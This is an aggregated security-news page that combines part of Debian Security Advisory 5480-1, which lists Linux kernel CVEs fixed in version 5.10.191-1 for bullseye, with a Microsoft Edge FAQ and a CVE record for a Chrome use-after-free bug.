CVE-2023-4194

    A type confusion in the implementation of TUN/TAP network devices  
    may allow a local user to bypass network filters.

CVE-2023-4273

    Maxim Suhanov discovered a stack overflow in the exFAT driver, which  
    may result in local denial of service via a malformed file system.

CVE-2023-20588

    Jana Hofmann, Emanuele Vannacci, Cedric Fournet, Boris Koepf and  
    Oleksii Oleksenko discovered that on some AMD CPUs with the Zen1  
    micro architecture an integer division by zero may leave stale  
    quotient data from a previous division, resulting in a potential  
    leak of sensitive data.

CVE-2023-21255

    A use-after-free was discovered in the in the Android binder driver,  
    which may result in local privilege escalation on systems where the  
    binder driver is loaded.

CVE-2023-21400

    Ye Zhang and Nicolas Wu discovered a double-free in the io_uring  
    subsystem, which may result in denial of service or privilege  
    escalation.

CVE-2023-31084

    It was discovered that the DVB Core driver does not properly handle  
    locking of certain events, allowing a local user to cause a denial  
    of service.

CVE-2023-34319

    Ross Lagerwall discovered a buffer overrun in Xen's netback driver  
    which may allow a Xen guest to cause denial of service to the  
    virtualisation host my sending malformed packets.

CVE-2023-35788

    Hangyu Hua that an off-by-one in the Flower traffic classifier may  
    result in local of service or the execution of privilege escalation.

CVE-2023-40283

    A use-after-free was discovered in Bluetooth L2CAP socket handling.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.191-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTfvC5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QmDBAAnjvIhfwWPmYeanAyC9Hwdx2L9ATqx235c5K4I9xOWCRR+1oiM3WIKDz1  
jnFbRnCKEPMUeIMWaSwXj11OvjDIY31nnUqRzf/hoT8PQ6dHi1p/fpmjReLFL9sw  
FoYhyabKtkGMBUXF4dCz2Qn62yPGFDgupBMlK1BQ1kJvxZABaKG0PGTqqPX4iOla  
DkbNvwq2lLr0K6oYKp8Nu+tQ+1I6U8PI4EvAlYbybvo0WXvbZy9pOmBilJhBqYrC  
6Ql1ndovBzDi3H8Qo+C8WJRdFcjP+dBOpW/lu9EcHbNmHG1cWLO8EexqvfoW8GAV  
qf0CEtULUwsn6pM5uW+SEgfsiETFPXbzQt+FxH2L2NGLhLmb73dIK074/Ids8lx4  
V4tNh+pVTli+sTCB6uGaRQvM4uNTxm5mV9+saacM6vel6KvD/qRreCMCDhvk9CkS  
ETg3sJjbw/Hv83RwfqTlXicJh5KpA5JikrztMnHNAQKru93uSH6dOLpOd45/SeA8  
KHw604LkeuzAiqFltE76HS1h/jDXO0Mfb0UvIH5N1tmgcr3qaRaFvZQ6sYy8NTHa  
6N5pnfKJJXRuYe/aadjlC2xQmUMvU8HD39dqp6Z+XFjjzLmz5NN9rLHZKqaLSx6C  
IFId+FMkkKLeQFWylM+mA5WwiUTEx0JvREFPjtOjJ4RDHf3Mmws=  
=z/8h  
-----END PGP SIGNATURE-----

Debian Security Advisory 5480-1

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Use after free in Device Trust Connectors in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   DEBIAN:DSA-5479
*   URL:https://www.debian.org/security/2023/dsa-5479
*   FEDORA:FEDORA-2023-f8e94641dc
*   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/
*   MISC:https://chromereleases.googleblog.com/2023/08/stable-channel-update-for-desktop\_15.html
*   URL:https://chromereleases.googleblog.com/2023/08/stable-channel-update-for-desktop\_15.html
*   MISC:https://crbug.com/1458303
*   URL:https://crbug.com/1458303

Assigning CNA

Chrome

Date Record Created

**20230815**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230815)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is an record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

Tag

#debian